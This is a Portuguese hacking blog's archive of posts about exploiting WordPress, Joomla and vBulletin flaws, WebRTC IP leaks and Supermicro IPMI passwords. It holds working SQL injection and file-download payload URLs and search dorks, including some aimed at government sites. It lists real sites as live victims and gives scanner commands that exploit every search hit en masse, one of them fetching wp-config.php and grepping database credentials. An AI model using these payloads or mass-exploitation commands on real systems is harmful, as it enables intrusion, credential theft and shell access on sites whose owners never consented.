Mostrando postagens com marcador exploit. Mostrar todas as postagens
Mostrando postagens com marcador exploit. Mostrar todas as postagens
quinta-feira, 12 de março de 2015
WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection / MINI EXPLOIT SQLMAP + SCANNER INURLBR
O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.
Descrição Técnica:
A vulnerabilidade de injeção blind SQL autenticado pode ser encontrado dentro do arquivo'admin/class-bulk-editor-list-table.php'. Os parâmetros GET order by e ordem não são suficientemente higienizado antes de serem usados dentro de uma consulta SQL.
Line 529:
$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title';
Line 533:
order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
Proof of Concept (PoC):
O seguinte pedido GET fará com que a consulta SQL possa executar e dormir por 10 segundos, se clicou no como um administrador autenticado, editor ou usuário autor.
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
DORK: inurl:admin.php?page=wpseo_bulk
Desenvolvi um mini exploit para ser executado junto com SCANNER INURLBR ou separadamente via da sua preferencia usando sqlmap para tal exploração.
O scanner INURLBR fará toda busca e em seguida o mine exploit vai explorá-lo com sqlmap.
Otimização:
FULL: http://pastebin.com/gi1Q4NmQ
EXECUTE MINI EXPLOIT: php mini_exploit.php www.target.com.br
COMANDO INURLBR:
./inurlbr.php --dork 'inurl:admin.php?page=wpseo_bulk' -s seo.txt -q 1,6 --comand-all "php mini_exploit.php _TARGET_"
REF:
https://wpvulndb.com/vulnerabilities/7841
http://cyberwarzone.com/sql-vulnerability-in-wordpress-seo-by-yoast-patch-immediatly/
segunda-feira, 2 de fevereiro de 2015
WebRTC - JavaScript bypass TOR/VPN - windows
Usuários de VPN estão enfrentando uma falha de segurança enorme, em que sites podem ter acesso facilmente a seus endereços de IP através WebRTC.
A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.
WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.
Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.
Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.
Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.
Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.
Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.
A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.
A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.
DEMO:
TESTE-DEMO: https://diafygi.github.io/webrtc-ips/
A demo afirma que plugins do navegador não podem bloquear a vulnerabilidade, mas felizmente isso não é inteiramente verdade. Existem várias soluções fáceis disponíveis para corrigir a falha de segurança.
Usuários do Chrome podem instalar a extensão bloco WebRTC ou ScriptSafe, que tanto supostamente pode bloquear a vulnerabilidade.
https://chrome.google.com/webstore/detail/webrtc-block/nphkkbaidamjmhfanlpblblcadhfbkdm
Usuários do Firefox deve ser capaz de bloquear o pedido com o addon NoScript. Alternativamente, eles podem digitar "about: config" na barra de endereços e definir a configuração "media.peerconnection.enabled" para false.
Exemplo-firefox:
Outras maneiras de fugir da falha.
"Talvez a melhor maneira de ser protegido de WebRTC e vulnerabilidades semelhantes é executar o túnel VPN diretamente no roteador. Isso permite que o usuário seja conectado a uma VPN diretamente via Wi-Fi, não deixando nenhuma possibilidade de um script desonestos ignorando um túnel VPN software e encontrar a própria IP real ", diz Ben Van der Pelt tells - TorGuard’s.
"Durante testes usuários do Windows que foram conectados por meio de um roteador VPN não eram vulneráveis a vazamentos WebRTC IP mesmo sem quaisquer correções do navegador".
Enquanto as correções acima são relatados para o trabalho, o vazamento é um lembrete de que o anonimato nunca deve ser tomada como garantida.
Como é frequentemente o caso com este tipo de vulnerabilidades, os usuários de VPN e proxy devem verificar regularmente se a sua conexão é segura. Isso também inclui o teste contra vazamentos de DNS e vulnerabilidades de proxy.
Update: O FreeBSD também parece estar afetado pela vulnerabilidade.
Não só Google Chrome,Mozilla Firefox que usam suporte API WebRTC, mas também Opera e Maxthon Cloud Browser podem ter sidos afetados.
Com modificações fizemos nosso scripts de exploração que alem de capturar o ip já faz o trapalho de salvar em um outpufile.
ARQUIVO-1 EXPLORAÇÃO:
http://pastebin.com/2u55h7Dj
ARQUIVO-2 SALVAR IPS:
Nome arquivo inurlbrasil.php
http://pastebin.com/Wbw9GhPc
Ao acessar o arquivo exploração-1, o mesmo passa via request get os ips captados do cliente para o arquivo-2(inurlbrasil.php) , assim já armazenando o mesmo no arquivo local server detentor do script.
FILE OUTPUT:
Fonte referencia:
http://pt.wikipedia.org/wiki/WebRTC
https://www.reddit.com/r/VPN/comments/2tva1o/websites_can_now_use_webrtc_to_determine_your
https://torguard.net/blog/browser-security-vulnerability-may-allow-real-ip-leak/
http://torrentfreak.com/huge-security-flaw-leaks-vpn-users-real-ip-addresses-150130/
https://twitter.com/jeremiahg/status/561892669279191040
segunda-feira, 19 de janeiro de 2015
0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification
-------------------------------------------------------------------------------------------
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
-------------------------------------------------------------------------------------------
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------
All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL
Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.
[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php
Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR
Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
Brief introduction --comand
[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR
[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php
Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR
Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
Example: --comand-vul {command}
Usage: --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
--comand-vul './exploit.sh _TARGET_ output.txt'
--comand-all Use this commmand to specify a single command to EVERY URL found.
Example: --comand-all {command}
Usage: --comand-all 'nmap sV -p 22,80,21 _TARGET_'
--comand-all './exploit.sh _TARGET_ output.txt'
Observation:
_TARGET_ will be replaced by the URL/target found, although if the user
doesn't input the get, only the domain will be executed.
_TARGETFULL_ will be replaced by the original URL / target found.
-------------------------------------------------------------------------------------------
INURLBR ADVANCED CONTROL
php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'
[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR
[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution
REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
domingo, 18 de janeiro de 2015
Arbitrary File Download vulnerability no tema Bretheon do wordpress
Arbitrary File Download vulnerability o que eu chamo de A.F.D.
Foi encontrada tal falha no tema Bretheon do wordpress.
--------------------------------------------------------------------------------------------------------------
DETALHES
Acesso: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan
Tested on: Linux / Window
Google Dork: inurl:wp-content/themes/bretheon/
Demo
http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
PoC
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------
Como tal falha no tema não usa nada de novo e o caminho padrão "admin-ajax.php?action=revslider_show_image&img=" nosso exploit desenvolvido meses atrás já faz tal verificação e pode ser usado tranquilamente.
--------------------------------------------------------------------------------------------------------------
[TUTORIAL]:
https://www.youtube.com/watch?v=w6pxPR_s05w
TUTORIAL DETALHES:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------
[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------
terça-feira, 23 de dezembro de 2014
Tutorial/Video EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR
TUTORIAL ::: E X P L O I T
$MASS_EXPLOIT = ($Script_Exploit + $SCANNER_INURLBR);
--------------------------------------------------------------------------------------------------------------
# NAME:::::::: Wordpress A.F.D Theme Echelon# TIPE:::::::: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor:::::: www.wordpress.org
# Tested on::: Linux
# EXECUTE::::: php exploit.php www.alvo.com.br
# OUTPUT:::::: EXPLOIT_WPAFD_Echelon.txt
--------------------------------------------------------------------------------------------------------------
EXPLOIT:::
DOWNLOAD::
LINK[0]::: http://pastebin.com/14uVQyUV
LINK[1]::: http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
--------------------------------------------------------------------------------------------------------------
USE::::::: MASS / USE SCANNER INURLBR
DOWNLOAD::
LINK[0]::: https://github.com/googleinurl/SCANNER-INURLBR
--------------------------------------------------------------------------------------------------------------
COMAND EXEC SCANNER INURLBR / comando de uso....
./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --command-all "php exploit.php _TARGET_"
--------------------------------------------------------------------------------------------------------------
Arquivos que o EXPLOIT verifica::
File download /etc/passwd & /etc/shadow
Failure consists of exploring a parameter $ _POST file
{alvo_target}/wp-content/themes/echelon/lib/scripts/dl-skin.php
The following fields are exploited for Arbitrary File Download
*REQUEST POST:*
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download
[Vídeo]
#-------------------------------------------------------------------
# AUTOR: GoogleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#-------------------------------------------------------------------
quarta-feira, 17 de dezembro de 2014
INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --command-all
Joomla Component com_page - SQL Injection
Explorando falha SQL componente com_page o diferencial que vamos utilizar 2 ferramentas para otimizar o tempo de analise:
FERRAMENTA -> SCANNER INURLBR
- Baixar: https://github.com/googleinurl/SCANNER-INURLBR
FERRAMENTA -> SQLMAP
- Baixar: https://github.com/sqlmapproject/sqlmap
DORK[1]:
inurl:index.php?option=com_page&id_p=
--------------------------------------------------------------------------------------
DORK[2]:
intext:option=com_page
--------------------------------------------------------------------------------------
Otimizando a busca
Quando usamos dorks temos um trabalho de acessar cada site testar e verificar se está vulnerável, muitas vezes remontar a url alvo.
Umas da utilidade do SCANNER INURLBR é fazer tal processo e otimizar nosso tempo.
Com analise de erros ou valores personalizados podemos identificar se está com erro padrão SQL e executar exploits/scripts externos para extrair mais informações.
Logica de processo:
Umas da utilidade do SCANNER INURLBR é fazer tal processo e otimizar nosso tempo.
Com analise de erros ou valores personalizados podemos identificar se está com erro padrão SQL e executar exploits/scripts externos para extrair mais informações.
Logica de processo:
- BUSCAR ALVOS EM MOTORES DE BUSCA.
- RETIRAR URLS INDESEJADAS.
- RETIRAR DUPLICATAS.
- CONVERTER VALORES EM UM ARRAY DE DADOS.
- ACESSAR ARRAY E PROCESSAR CADA URL INDIVIDUALMENTE.
- ANALISAR ERROS PADRÕES OU PERSONALIZAS.
- SE (OPÇÃO COMAND ESTIVER SETADA SERÁ EXECUTADO UM COMANDO NO TERMINAL)
- ALVOS QUE FOREM ENCONTRADOS ERROS PADRÕES PREDEFINIDOS NO SCRIPT SERÁ SEPARADO EM UM ARQUIVO OUTPUT.
Usando SCANNER INURLBR:
Comando->{
Comando->{
Exmplo:
./inurlbr.php
--dork 'YOUR_DORK'
-s OUTPUT.txt
-q {OP_MOTOR_SEARCH}
--comand-all 'RUN_YOUR_COMMAND_IN_TERMINAL'
Usando:
./inurlbr.php --dork 'inurl:index.php?option=com_page & id_p' -s joomla.txt -q 1,6 --command-all './../../../googleinurl/pentest/sqlmap/sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'
Observação parâmetro --command-all:
Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca.
Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP,
O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.
Indo a fundo em --command-*
Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP,
O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.
Indo a fundo em --command-*
--command-vul Cada URL vulnerável encontrada irá executar os parâmetros deste comando.
Exemplo: --command-vul {comando}
Uso: --command-vul "nmap sV -p 22,80,21 _TARGET_ '
--command-vul './exploit.sh _TARGET_ output.txt'
--command-all Utilize este comand para especificar um único comando a cada URL encontrado.
Exemplo: --command-all {comando}
Uso: --command-all 'nmap sV -p 22,80,21 _TARGET_'
--command-all './exploit.sh _TARGET_ output.txt'
observação:
_TARGET_ Será substituído pelo URL filtrando somente o domínio.
Ex: www.google.com.br/?q=testeste _TARGET_ = www.google.com.br
Ex: www.google.com.br/?q=testeste _TARGET_ = www.google.com.br
_TARGETFULL_ Será substituído pelo URL / alvo original encontrado.
Ex: www.google.com.br/?q=testeste _TARGETFULL_ = www.google.com.br/?q=testeste
Em nosso caso exploramos uma falha SQL-Injection com SQLMAP.
sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'
RESULTADO:
}
Referencias
terça-feira, 16 de dezembro de 2014
Wordpress A.F.D Theme Echelon Explorando tema wordpress falha Arbitrary File Download
EXPLOIT Wordpress A.F.D Theme Echelon
Explorando tema Echelon do wordpress falha Arbitrary File Download
Explorando tema Echelon do wordpress falha Arbitrary File Download
# NAME: Wordpress A.F.D Theme Echelon # TIPE: Arbitrary File Download # Vendor: www.wordpress.org # Tested on: Linux # EXECUTE: php exploit.php www.alvo.com.br # OUTPUT: EXPLOIT_WPAFD_Echelon.txt # AUTOR: GoogleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # GIT: https://github.com/googleinurl # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
Pois bem já que o 1337day não publicou o script posto aqui, "alias tem muito bla bla pra preeche odeio" rsrs.
A falha consista em explorar um um parâmetro $_POST do arquivo
/wp-content/themes/echelon/lib/scripts/dl-skin.php
Os seguintes campos são explorados para o Arbitrary File Download
Via POST:
_mysite_download_skin={$config['file']}&submit=Download
Ex:
_mysite_download_skin=/etc/passwd&submit=Download
Sem os devidos filtros podemos ter acesso a arquivos internos do servidor alvo.
Para tal validação desenvolvi um exploit pra validar tais valores expotos pelo /etc/passwd e /etc/ shadow encontrando padrão baseado na seguintes expressões regulares:
------------------------------------------------------------------------------------------------
preg_match_all("(root:.*)", $rest['corpo'], $final);
preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
------------------------------------------------------------------------------------------------
Exploração:
Baixar Exploit: http://pastebin.com/14uVQyUV / http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
Modo de executar:
php exploit.php http://alvo
Resultado:
Agora vamos usar tal exploit junto com SCANNER INURLBR assim transformando o mesmo em um explorador massivo... EXPLORING MASS! EXPLORING MASS!
Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
Comando de execução:
./inurlbr.php --dork '[DORK]inurl:/wp-content/themes/echelon[DORK]"index of" /themes/echelon' -q 1,6 -s save.txt --comand-all "php exploitAFD.php _TARGET_"
Explicando comando:
--dork vai definir código avançado de busca google.
[DORK] é uma expressão usada dentro do parâmetro --dork que possibilita usar varias dorks em uma só analise.
-s salvar alguns sites vulns caso o scanner encontre.
-q define motores de busca a serem usados.
--comand-all executa comando no terminal para cada alvo encontrado.
para mais informações sobre --comand consulte o help do script.
Ajuda:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
Resultado execução:
Pesquisa dork:
DORK: inurl:/wp-content/themes/echelon
DORK: "index of" /themes/echelon
Baixar Exploit: http://pastebin.com/14uVQyUV
Ajuda: https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
quinta-feira, 27 de novembro de 2014
Explorando Slider Revolution/Showbiz Pro Shell Upload Exploit
0x===> Slider Revolution/Showbiz Pro Shell Upload Exploit
Bom vamos lá novamente surge um bug critico em um plugin do Wordpress novamente o plugin afetado é o Slider Revolution estima-se que atualmente ele seja o plugin para slider.
[INFO INTERNA DO EXPLOIT]{
Além da vulnerabilidade LFI recentemente que foi publicado há alguns meses, esta é uma outra vulnerabilidade que os desenvolvedores não corrigiram.
Decidiram disponibilizar sem liberar um boletim de segurança completo, deixando milhares de usuários revslider que não atualizam o seu plugin para a versão mais recente (=> 3.0.96) vulnerável a esta falha desagradável, revsliders desenvolvedores irão argumentar o fato de que seu controle vem com um recurso de atualização automática, mas o problema é que este plugin é empacotado com um monte de temas, o que significa que esses temas os usuários podem não conseguir as devidas atualizações de plugins ou terá que pagar para obter a atualização. Em outras palavras desenvolvedores da revslider acredito que cada usuário deve ter o recurso de atualização automática, caso contrário ... você está ferrado.
Obviamente, isso é muito mais importante do que a vulnerabilidade LFI, pois permite o acesso shell dando atacantes acesso ao sistema de destino bem como a capacidade para despejar todo o banco de dados wordpress localmente.
Dito isto, deve-se atualizar imediatamente para a versão mais recente ou desativar / switch para outro plugin.
Quanto Showbiz Pro, infelizmente a vulnerabilidade nunca foi criado um patched como foi explorada com sucesso na última versão (1.7.1)
}
Download:
Exploit:
Exploit update zip files:
Dependências de para uso:
Requires LWP::UserAgent
apt-get install libwww-perl
yum install libwww-perl
perl -MCPAN -e 'install Bundle::LWP'
For SSL support:
apt-get install liblwp-protocol-https-perl
yum install perl-Crypt-SSLeay
Começando a exploração
Primeiro baixaremos o exploit http://1337day.com/exploit/22938
No código do exploit encontramos dois zip's citados acima para baixar:
Fazemos o download dos arquivos na mesma pasta em que o exploit.pl esteja alocado.
Mãos a obra
0x Comando / Demo:
- perl exploit.pl <target> <plugin>
- perl exploit.pl http://localhost revslider
- perl exploit.pl http://localhost showbiz
- perl exploit.pl http://localhost revslider
A primeira forma de explorar essa falha é pegando acesso via terminal nos dando acesso a pasta
"wp-content/plugins/__PLUGIN__/temp/update_extract/__PLUGIN__/"
(os locais com __PLUGIN__ é o nome do plugin escolhido),
Depois de tal processo se foi executado com sucesso apos isso é temos acesso ao terminal shell da maquina vulnerável, assim executando comandos como id,ls,wget entre outros.
A segunda maneira que o exploit nos permite obter acesso é por meio de uma webshell que fica alocada em "wp-content/plugins/__PLUGIN__/temp/update_extract/temp.php".
DORK[0] site:.gov.br inurl:/temp/update_extract/ revslider
DORK[1] site:.br inurl:/temp/update_extract/ revslider
DORK[2] site:.br inurl:/temp/update_extract/
Comando compatível com SCANNER INURLBR:
./inurlbr.php --dork 'site:.gov.br inurl:/temp/update_extract/' -s wordpress.txt -q 1,6 --comand-all 'perl exploitWordpressSlide.pl http://_TARGET_ revslider'
OBS: Para usar tal exploits junto ao scanner inurlbr deve-se modificar tal scritp em seu banner retirando a linha 140 que contem um limpador de tela.
line 140: system(($^O eq 'MSWin32') ? 'cls' : 'clear');
SCANNER INURLBR BAIXAR:
https://github.com/googleinurl/SCANNER-INURLBR
sexta-feira, 19 de setembro de 2014
SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar
0xSCAN + EXPLOIT
----------------------------------------------------------------------------------------------------------
0x[+] Exploit Author : Claudio Viviani
0x[+] Vendor Homepage : http://web-dorado.com/
0x[+] Software: http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329
Date : 2014-08-31
0x[+] Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox
------------------------------------------------------------------------------------------------
0xDORK[0]: inurl:option=com_spidercalendar
0xDORK[1]: intext:com_spidercalendar & intext:"index of"
0xDORK[2]: inurl:php & inurl:com_spidercalendar
0xVÍDEO[0]
0xVÍDEO[1]
0xCOMANDO INURLBR EXEMPLO={
./inurlbr.php --dork 'inurl:index.php?option=com_spidercalendar' -s joomla.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'0x27" --command-vul "python exploit/Joomla/joomla-calendar.py -H http://_TARGET_/"
}
0xSCRIPT INURLBR = {
https://github.com/googleinurl/SCANNER-INURLBR
}
0xEXPLOIT Joomla Plugin Calendar = {
http://1337day.com/exploit/22603
}
segunda-feira, 15 de setembro de 2014
Exploit HTMLEditor e dorks upload de arquivos
Explorando HTMLEditor
DORK[0]=> inurl:/HTMLEditor/editor/
DORK[1]=> inurl:/HTMLEditor/editor//filemanager/
DORK[2]=> inurl:/HTMLEditor/editor//filemanager//connectors/
DORK[3]=> inurl:HTMLEditor & "Index of"
DORK[4]=> inurl:"connectors/uploadtest.html" & "Index of"
DORK[5]=> inurl:"/editor/filemanager/" ext:html
DORK[6]=> inurl:"/filemanager/" "Resource Type"
http://www.target.com/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://www.target.com/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Mude o conectar para PHP ele vai efetuar o upload.
Suporte de arquivos: TXT e JPG em algums sites você pode fazer upload HTML e PHP demais.
O arquivo upado pode ser encontrado em:
http://www.target.com/PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
or
http://www.target.com/patch//PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
Ex:
http://thymeoncavill.com.au/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
UPLOAD=>
http://thymeoncavill.com.au/CMS/files/10487462_686112868144329_1233575004575245355_n.jpg
Exemplo de uso SCANNER INURLBR
COMANDO=>{./inurlbr.php --dork 'inurl:"/filemanager/" "Resource Type"' -q 1,6 -s fkeditor.txt -t 2 --replace='/filemanager/[INURL]/filemanager/connectors/uploadtest.html?' -a '
}
Resultado:
BAIXAR SCANNER INURLBR
https://github.com/googleinurl/SCANNER-INURLBR
https://github.com/googleinurl/SCANNER-INURLBR
quinta-feira, 4 de setembro de 2014
FALHA! Injeção de SQL em vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2 (Exploit + Vídeo)
vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.
Segundo vBulletin que confirma o problema afeta as versões 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2. O grupo romeno Romanian Security Team (RST) postou um vídeo que mostra a vulnerabilidade e confirma o relatório para vBulletin, que irá fornecer todos os detalhes após o lançamento do patch.
A vulnerabilidade permite que um atacante realize ataques de injeção SQL no banco de dados, com todas as implicações que isso pode trazer. Ou seja, extrair todas as informações e conteúdo do banco de dados, e até mesmo de lá comprometer todo o sistema.
Tal façanha foi publicado e nos permite obter a versão, nome de usuário e banco de dados para obter detalhes mais suculentos deve modificar o exploit:
Vídeo demostrativo=>
Usando exploit=> http://pastebin.com/hb2adMn6
php exploit.php {target}
Ex: php exploit.php http://forum.teste.com.br
DORK[0]=> "Powered by vBulletin® Version 5.1.2"
DORK[1]=> "Powered by vBulletin® Version 5.0.4"
DORK[2]=> "Powered by vBulletin® Version 5.0.5"
DORK[3]=> "Powered by vBulletin® Version 5.1.0"
DORK[4]=> "Powered by vBulletin® Version 5.1.1"
DORK[5]=> site:com intext:"5.0.4" & "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org
Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o ferramenta INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner, mas nada impede de usar com o scan script feito pela (RST).
Comando INURLBR=>
./inurlbr.php --dork 'site:com intext:"5.0.4" "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org -site:forumrunner.com' -s vBulletin.txt -q 6 -t 1 --comand-all 'php exploitvBulltin.php http://_TARGET_'
Demostrativo=>
Fontes=>{
[+] http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html[+] http://unaaldia.hispasec.com/2014/07/inyeccion-sql-en-el-gestor-de-foros.html
[+] http://packetstormsecurity.com/files/127537/vBulletin-5.1.2-SQL-Injection.html
[+] http://1337day.com/exploits/22452
}
terça-feira, 19 de agosto de 2014
Scanner de Falhas em Servidores Supermicro IPMI/BMC
Como sabemos há poucos dias foi descoberta uma falha que expõe mais de 32 mil senhas administrativas dos servidores que utilizam a motherboard da Supermicro, estas senhas estão expostas com acesso pela porta 49152.
Hoje trago um exploit capas de encontrar estas maquinas vulnerável.
Este script automatiza a exploração da vulnerabilidade que expõe as senhas em formato texto destas maquinas.
Esta ferramenta pode verificar sub-redes, hosts individual e ainda inclui a opção de utilizar proxy dificultando a detecção do atacante e não bastando também possui a opção de pesquisa da falha via SHODANHQ
Basta copiar o código abaixo e colar em um arquivo com o nome supermicro_scan.sh
Lembrando Este script é para utilizadores de LINUX.
SCRIPT=> { http://pastebin.com/epQmZne8 }
FONTE=> { http://virusbrasil.com.br/?p=106 }
Hoje trago um exploit capas de encontrar estas maquinas vulnerável.
Este script automatiza a exploração da vulnerabilidade que expõe as senhas em formato texto destas maquinas.
